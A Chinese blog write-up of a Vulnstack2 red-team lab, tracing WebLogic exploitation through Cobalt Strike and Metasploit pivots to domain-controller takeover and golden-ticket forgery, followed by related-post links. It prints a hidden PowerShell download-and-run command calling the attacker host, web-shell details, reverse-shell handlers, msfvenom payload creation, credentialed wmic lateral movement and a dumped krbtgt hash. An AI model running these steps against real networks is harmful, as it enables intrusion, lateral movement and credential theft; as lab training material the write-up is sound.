作者：不染
免责声明：本文仅供学习研究，严禁从事非法活动，任何后果由使用者本人负责。

0x00 简介

最近学点攻防，拿靶场练练手，大佬轻喷哈。

靶场简介：
红队实战系列，主要以真实企业环境为实例搭建一系列靶场，通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay，EWS relay，PTT(PTC)，MS14-068，GPP，SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。

Bypass UAC
Windows系统NTLM获取（理论知识：Windows认证）
Access Token利用（MSSQL利用）
WMI利用
网页代理，二层代理，特殊协议代理（DNS，ICMP）
域内信息收集
域漏洞利用：SMB relay，EWS relay，PTT(PTC)，MS14-068，GPP，SPN利用
域凭证收集
后门技术（黄金票据/白银票据/Sid History/MOF）
靶场由三台机器构成：WIN7、2008 server、2012 server
其中2008做为对外的web机，win7作为个人主机可上网，2012作为域控

网络拓扑：
win10攻击机：192.168.111.128
kali攻击机：192.168.111.129
DC：10.10.10.10
PC：192.168.111.201
web：10.10.10.80 192.168.111.80
靶场踩坑注意：
靶机通用密码：1qaz@WSX
WEB主机初始的状态默认密码无法登录，切换用户 de1ay/1qaz@WSX ，然后修改WEB\de1ay的密码
注意需要手动开启服务，在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理，管理员身份运行它即可
管理员账号密码：Administrator/1qaz@WSX

0x01 外网渗透

1.1外网探测

先使用-sS参数进行端口探测

结果整理如下：
445端口开放，存在smb服务，可能存在ms17-010/端口溢出漏洞
139端口开放，存在samba服务，可能存在爆破/未授权访问/远程命令执行漏洞
1433端口开放，存在mssql服务，可能存在爆破/注入/SA弱口令
3389端口开放，存在远程桌面
7001端口开放，存在weblogic

1.2 Weblogic漏洞利用

看一下Weblogic，这里先使用Java 反序列化终极测试工具测试漏洞

这里上传冰蝎马，路径如下：

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell.jsp

注意：对于反序列化漏洞，如果获得的是系统权限或者root权限，那就没必要上传木马，但如果只是web安装应用的权限，就上传获取更大权限。weblogic上传马的路径选择问题，可以参考相关文章，这里不再赘述。

使用冰蝎连接

http://192.168.111.80:7001/uddiexplorer/shell.jsp

密码为：rebeyond

连接成功，权限为administrator

1.3 CS派生MSF

kali上先开启CS服务端，端口号为54321

在win10攻击机连接客户端

新建监听器，name为web，其他默认。

使用Cobalt strike生成一个木马放在WEB中

复制powershell远程下载语句，语句如下：

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.111.129:80/a'))"

然后在冰蝎shell中调用powershell远程加载执行恶意ps1

这里可以看到，cs上线，权限为administrator

新建监听器，配置如下：

name：msf
payload：foreign http
ip：192.168.111.129
port：1111

在192.168.111.129的shell中执行spawn命令

在 msf中开启监听模块，命令如下：

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.129
set lport 1111
run

这里可以看到，cs的会话已经派生到msf上

0x02内网渗透

2.1 ms14-058提权

先利用cs的Mimikatz插件获取凭据（需要Administrator权限）

利用ms14-058提权至system权限

这里可以看到已提升为system权限

2.2域信息收集

执行ipconfig /all命令，这里可以看到有双网卡。

使用cs的端口扫描模块，扫描内网

关闭防火墙

防火墙成功关闭

2.2.1查找域内用户

使用net user /domain 命令查看域内用户情况（需要system权限）

2.2.2查找域管理员

使用net group “domain admins” /domain 命令查找域管理员

2.2.3查找主域控

使用net group “domain controllers” /domain命令查看主域控

2.3 DC上线

新建一个派生监听器

在列表中选择psexec

选择的user为de1ay的凭据

选择smb会话

DC成功上线

2.4 msf中转路由

使用meterpreter生成payload.exe

msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.80 LPORT=8888 -f exe >  payload.exe

接着在cs中建立ipc连接，命令如下：

shell net use \\10.10.10.10\ipc$ 1qaz@WSX /user:de1ay

shell copy C:\Users\de1ay.DE1AY\Desktop\payload.exe \\10.10.10.10\c$\windows\temp\payload.exe

在cs的跳板机上利用wmic启动木马，命令如下：

shell wmic /node:10.10.10.10 /user:de1ay /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"

接着使用meterpreter进行监听，命令如下：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.80
set lport 8888
run

DC成功上线

0x03 域内权限维持

3.1域控信息收集

在域控上读取krbtgt账户的ntlm密码哈希和SID

Krbtgt：82dfc71b72a11ef37d663047bc2088fb
SID：S-1-5-21-2756371121-2868759905-3853650604-1001
接着用来伪造黄金票据。

3.2伪造黄金票据

黄金票据是伪造票据授予票据（TGT），也被称为认证票据。如下图所示，与域控制器没有AS-REQ或AS-REP（步骤1和2）通信。由于黄金票据是伪造的TGT，它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。

Kerberos黄金票据是有效的TGT Kerberos票据，因为它是由域Kerberos帐户（KRBTGT）加密和签名的。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。

黄金票据的条件要求：
1.域名称

2.域的sid 值

3.域的krbtgt账户ntlm密码哈希

4.伪造用户名
一旦攻击者拥有管理员访问域控制器的权限，就可以使用Mimikatz来提取KRBTGT帐户密码哈希值。

利用已经获得的krbtgt账户ntlm密码哈希和sid值制作黄金票据

伪造成功

0x04 总结

靶场比较经典，姿势较为简单，以后还会看情况更新其他靶场。

0x05 了解更多安全知识

欢迎关注我们的安全公众号，学习更多安全知识！！！
欢迎关注我们的安全公众号，学习更多安全知识！！！
欢迎关注我们的安全公众号，学习更多安全知识！！！

攻防靶场｜Vulnstack2靶场之CS实战相关推荐

攻防系列——pikachu靶场通关练习
目录一.暴力破解 Burte Force(暴力破解)概述 (一)基于表单的暴力破解 (二)验证码绕过(on server) (三)验证码绕过(on client) (四)token 防爆破二.Cr ...
ATTCK 靶场 vulnstack2 超详细渗透记录
本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担. 目录一.环境搭建二.外网渗透三.内网信息收集四.横向移动五.权限维持一.环境搭建靶场下载地址:下载地址靶场统一 ...
vulnhub靶场{GoldenEye-v1靶场实战}
远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...
APT组织最喜欢的工具 Cobalt Strike (CS) 实战
一.Cobalt Strike 背景 Cobalt Strike 在威胁攻击者的恶意活动中的使用次数正在增加.从 2019 年到 2020 年,使用Cobalt Strike 的威胁攻击者增加了 16 ...
vulnhub靶场GoldenEye靶场
靶场信息: 地址:GoldenEye: 1 ~ VulnHub 发布日期:2018年5月4日目标:得到root权限并且找到flag.txt 难度:中级(CTF) hint: Useful to he ...
mysql靶场_BWVS靶场搭建
前言新发现一个靶场(虽然这个靶场很早就有了),搭建一下,和以往的靶场不同,不是直接把文件夹放到www目录下就行,还需要更改一些设置.虽然,这个靶场的开发者虽然给了提示,但是,提示不够啊,来写一下. ...
vulnhub靶场Tr0ll3靶场
vulnhub靶场–靶场信息收集主机发现 ifconfig 查看Kali IP nmap192.168.17.0/24 端口扫描 nmap -sV 192.168.17.130 -p- 可以看到开 ...
oracle 注入靶场,pick靶场-sql注入
甲.数字型注入数字型注入一般提交值没有引号,所以直接在后面构造语句就可以了. 抓包查看构造语句提交后该数据库表内容被爆出来了. 乙.字符型注入首先我们要知道一点,字符串在数据库中提交是需要用 ...
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
渗透测试渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集.漏洞挖掘.权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告. ...

攻防靶场｜Vulnstack2靶场之CS实战